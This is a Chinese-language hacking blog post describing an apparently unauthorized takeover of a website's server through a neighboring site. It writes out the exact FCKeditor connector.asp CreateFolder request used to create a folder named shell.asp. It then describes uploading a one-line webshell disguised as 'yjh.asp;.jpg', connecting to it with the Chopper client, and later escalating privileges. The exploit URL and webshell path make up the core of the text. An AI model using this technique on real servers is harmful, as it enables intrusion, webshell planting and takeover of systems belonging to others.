FCK突破建立文件夹后台拿shell

         今天准备搞一个站,在此站搞了一翻后发现此站没有找到可利用的漏洞,此时就有点感觉蛋疼了,所以就想找个旁站来提权,扫描了一下旁站 我靠没有几个站点,后来在经过一翻努力下,终于还是登录进了一个站的后台,在后台瞧了一会,发现是FCK编辑器,哈 有点希望了,马上想到用FCK的突破建立文件夹的漏洞试下。下面就写下FCK突破建立文件夹后台拿shell方法,这个百度里面有很多这样的教程,现在我还是稍微详细的写一篇吧。

找了个添加新闻的地方,点击上传图片→浏览服务器,如下图:

fck

然后新建一个文件夹,命名为 qxz.asp 如下图:

17224130

但是被自动命名变成了 qxz_asp 如下图:

7224509

下面我们就要用到绕过代码来突破了,代码如下:

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

把上面的代码加在网站链接后面,按下回车。如:http://www.xxx.com/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

OK成功

31117225210

然后关掉此页面,再次点击添加图片 浏览服务器。自动创建了一个 shell.asp 的文件夹

1117225734

然后把一句话改名为 yjh.asp;.jpg 上传一句话马到此文件夹中。

131117230240

OK菜刀链接地址 http://www.xxx.com/Upload/image/shell.asp/yjh_asp;.jpg

31117230724

最后上大马,经过一翻提权战斗,终于拿下了这台服务器,天色不早了,提权过程就不写了。

原创文章转载请注明:转载自 七行者博客

本文固定链接: http://www.qxzxp.com/3961.html